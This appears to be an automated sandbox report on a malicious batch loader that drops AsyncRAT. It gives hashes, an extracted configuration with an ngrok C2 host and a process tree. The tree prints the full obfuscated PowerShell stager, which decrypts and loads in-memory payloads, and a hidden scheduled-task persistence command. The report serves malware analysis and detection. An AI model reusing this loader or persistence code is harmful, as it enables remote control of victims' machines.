Analysis
-
max time kernel
1360s -
max time network
1152s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
14-08-2024 18:39
Static task
static1
General
-
Target
Bloody_Loader.bat
-
Size
272KB
-
MD5
7c0a3650dec50cf6ebebccbeefde89fc
-
SHA1
066764d975297ccb6a4ad915e9f3a4757f739362
-
SHA256
eb94ad681ca2acc14bd598c0fcefbc4c059e2de8f1ff2a93401bfdc56fbfb453
-
SHA512
ec1656af327a5df43ef4765cc1221411ae5f402809b165b741ea4749110825f5724dfa0611286cc8f2ac401b9f9cb440dbdf359f826d3cbddbded987a5586635
-
SSDEEP
6144:K4X36tiZ6MmwN5aQgSOzGhjWEop+/k1f+JcXB:9KwZQmcQgSO6hjFopwkp7
Malware Config
Extracted
asyncrat
1.0.7
Slave
0.tcp.ngrok.io:19607
DcRatMutex_UIHUIHUIGUvytyfIfUDytYTdyyDytdtyducyCw
-
delay
1
-
install
true
-
install_file
guiGUIgYFyufiuyIgogILGoW.exe
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/memory/3176-46-0x0000021272670000-0x0000021272682000-memory.dmp family_asyncrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 2792 powershell.exe 3300 powershell.exe 3176 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1735401866-3802634615-1355934272-1000_Classes\Local Settings powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2792 powershell.exe 2792 powershell.exe 3300 powershell.exe 3300 powershell.exe 3176 powershell.exe 3176 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2792 powershell.exe Token: SeDebugPrivilege 3300 powershell.exe Token: SeIncreaseQuotaPrivilege 3300 powershell.exe Token: SeSecurityPrivilege 3300 powershell.exe Token: SeTakeOwnershipPrivilege 3300 powershell.exe Token: SeLoadDriverPrivilege 3300 powershell.exe Token: SeSystemProfilePrivilege 3300 powershell.exe Token: SeSystemtimePrivilege 3300 powershell.exe Token: SeProfSingleProcessPrivilege 3300 powershell.exe Token: SeIncBasePriorityPrivilege 3300 powershell.exe Token: SeCreatePagefilePrivilege 3300 powershell.exe Token: SeBackupPrivilege 3300 powershell.exe Token: SeRestorePrivilege 3300 powershell.exe Token: SeShutdownPrivilege 3300 powershell.exe Token: SeDebugPrivilege 3300 powershell.exe Token: SeSystemEnvironmentPrivilege 3300 powershell.exe Token: SeRemoteShutdownPrivilege 3300 powershell.exe Token: SeUndockPrivilege 3300 powershell.exe Token: SeManageVolumePrivilege 3300 powershell.exe Token: 33 3300 powershell.exe Token: 34 3300 powershell.exe Token: 35 3300 powershell.exe Token: 36 3300 powershell.exe Token: SeIncreaseQuotaPrivilege 3300 powershell.exe Token: SeSecurityPrivilege 3300 powershell.exe Token: SeTakeOwnershipPrivilege 3300 powershell.exe Token: SeLoadDriverPrivilege 3300 powershell.exe Token: SeSystemProfilePrivilege 3300 powershell.exe Token: SeSystemtimePrivilege 3300 powershell.exe Token: SeProfSingleProcessPrivilege 3300 powershell.exe Token: SeIncBasePriorityPrivilege 3300 powershell.exe Token: SeCreatePagefilePrivilege 3300 powershell.exe Token: SeBackupPrivilege 3300 powershell.exe Token: SeRestorePrivilege 3300 powershell.exe Token: SeShutdownPrivilege 3300 powershell.exe Token: SeDebugPrivilege 3300 powershell.exe Token: SeSystemEnvironmentPrivilege 3300 powershell.exe Token: SeRemoteShutdownPrivilege 3300 powershell.exe Token: SeUndockPrivilege 3300 powershell.exe Token: SeManageVolumePrivilege 3300 powershell.exe Token: 33 3300 powershell.exe Token: 34 3300 powershell.exe Token: 35 3300 powershell.exe Token: 36 3300 powershell.exe Token: SeIncreaseQuotaPrivilege 3300 powershell.exe Token: SeSecurityPrivilege 3300 powershell.exe Token: SeTakeOwnershipPrivilege 3300 powershell.exe Token: SeLoadDriverPrivilege 3300 powershell.exe Token: SeSystemProfilePrivilege 3300 powershell.exe Token: SeSystemtimePrivilege 3300 powershell.exe Token: SeProfSingleProcessPrivilege 3300 powershell.exe Token: SeIncBasePriorityPrivilege 3300 powershell.exe Token: SeCreatePagefilePrivilege 3300 powershell.exe Token: SeBackupPrivilege 3300 powershell.exe Token: SeRestorePrivilege 3300 powershell.exe Token: SeShutdownPrivilege 3300 powershell.exe Token: SeDebugPrivilege 3300 powershell.exe Token: SeSystemEnvironmentPrivilege 3300 powershell.exe Token: SeRemoteShutdownPrivilege 3300 powershell.exe Token: SeUndockPrivilege 3300 powershell.exe Token: SeManageVolumePrivilege 3300 powershell.exe Token: 33 3300 powershell.exe Token: 34 3300 powershell.exe Token: 35 3300 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1964 wrote to memory of 4768 1964 cmd.exe 82 PID 1964 wrote to memory of 4768 1964 cmd.exe 82 PID 4768 wrote to memory of 1680 4768 net.exe 83 PID 4768 wrote to memory of 1680 4768 net.exe 83 PID 1964 wrote to memory of 2792 1964 cmd.exe 85 PID 1964 wrote to memory of 2792 1964 cmd.exe 85 PID 2792 wrote to memory of 3300 2792 powershell.exe 86 PID 2792 wrote to memory of 3300 2792 powershell.exe 86 PID 2792 wrote to memory of 3288 2792 powershell.exe 89 PID 2792 wrote to memory of 3288 2792 powershell.exe 89 PID 3288 wrote to memory of 2348 3288 WScript.exe 90 PID 3288 wrote to memory of 2348 3288 WScript.exe 90 PID 2348 wrote to memory of 948 2348 cmd.exe 92 PID 2348 wrote to memory of 948 2348 cmd.exe 92 PID 948 wrote to memory of 4884 948 net.exe 93 PID 948 wrote to memory of 4884 948 net.exe 93 PID 2348 wrote to memory of 3176 2348 cmd.exe 94 PID 2348 wrote to memory of 3176 2348 cmd.exe 94
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Bloody_Loader.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:4768 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:1680
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fV/Up7qUPSsYVv8qPYBq388BVTyBfx7AFUTIN6pX+9Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UPoLFJh/fjC0c7227bhlQQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dPUNI=New-Object System.IO.MemoryStream(,$param_var); $hEbTl=New-Object System.IO.MemoryStream; $WZgAA=New-Object System.IO.Compression.GZipStream($dPUNI, [IO.Compression.CompressionMode]::Decompress); $WZgAA.CopyTo($hEbTl); $WZgAA.Dispose(); $dPUNI.Dispose(); $hEbTl.Dispose(); $hEbTl.ToArray();}function execute_function($param_var,$param2_var){ $IobAO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $cRlcB=$IobAO.EntryPoint; $cRlcB.Invoke($null, $param2_var);}$lIqxF = 'C:\Users\Admin\AppData\Local\Temp\Bloody_Loader.bat';$host.UI.RawUI.WindowTitle = $lIqxF;$dBxyo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lIqxF).Split([Environment]::NewLine);foreach ($mhKyv in $dBxyo) { if ($mhKyv.StartsWith(':: ')) { $RbMzN=$mhKyv.Substring(3); break; }}$payloads_var=[string[]]$RbMzN.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_937_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_937.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3300
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_937.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_937.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\system32\net.exenet file5⤵
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file6⤵PID:4884
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fV/Up7qUPSsYVv8qPYBq388BVTyBfx7AFUTIN6pX+9Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UPoLFJh/fjC0c7227bhlQQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dPUNI=New-Object System.IO.MemoryStream(,$param_var); $hEbTl=New-Object System.IO.MemoryStream; $WZgAA=New-Object System.IO.Compression.GZipStream($dPUNI, [IO.Compression.CompressionMode]::Decompress); $WZgAA.CopyTo($hEbTl); $WZgAA.Dispose(); $dPUNI.Dispose(); $hEbTl.Dispose(); $hEbTl.ToArray();}function execute_function($param_var,$param2_var){ $IobAO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $cRlcB=$IobAO.EntryPoint; $cRlcB.Invoke($null, $param2_var);}$lIqxF = 'C:\Users\Admin\AppData\Roaming\startup_str_937.bat';$host.UI.RawUI.WindowTitle = $lIqxF;$dBxyo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lIqxF).Split([Environment]::NewLine);foreach ($mhKyv in $dBxyo) { if ($mhKyv.StartsWith(':: ')) { $RbMzN=$mhKyv.Substring(3); break; }}$payloads_var=[string[]]$RbMzN.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3176
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
Filesize
1KB
MD5eb15ee5741b379245ca8549cb0d4ecf8
SHA13555273945abda3402674aea7a4bff65eb71a783
SHA256b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636
SHA5121f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
272KB
MD57c0a3650dec50cf6ebebccbeefde89fc
SHA1066764d975297ccb6a4ad915e9f3a4757f739362
SHA256eb94ad681ca2acc14bd598c0fcefbc4c059e2de8f1ff2a93401bfdc56fbfb453
SHA512ec1656af327a5df43ef4765cc1221411ae5f402809b165b741ea4749110825f5724dfa0611286cc8f2ac401b9f9cb440dbdf359f826d3cbddbded987a5586635
-
Filesize
115B
MD531ac93556d45bd5c7cda7de15c644174
SHA19c244354242c78b753d64c22bfb2ad5a8085ddc9
SHA256642d1de104dad1181474117b26e8b04dccd3726e217bcfeeba3ec1995485aae1
SHA51281a40b94453357af856ad29253ba61b6df35ee5b798f2a2ee8fc15ca11eff67de208b51cdc740e62b81c451ec8041602d6a53c50df911dd0c82640d6428283e4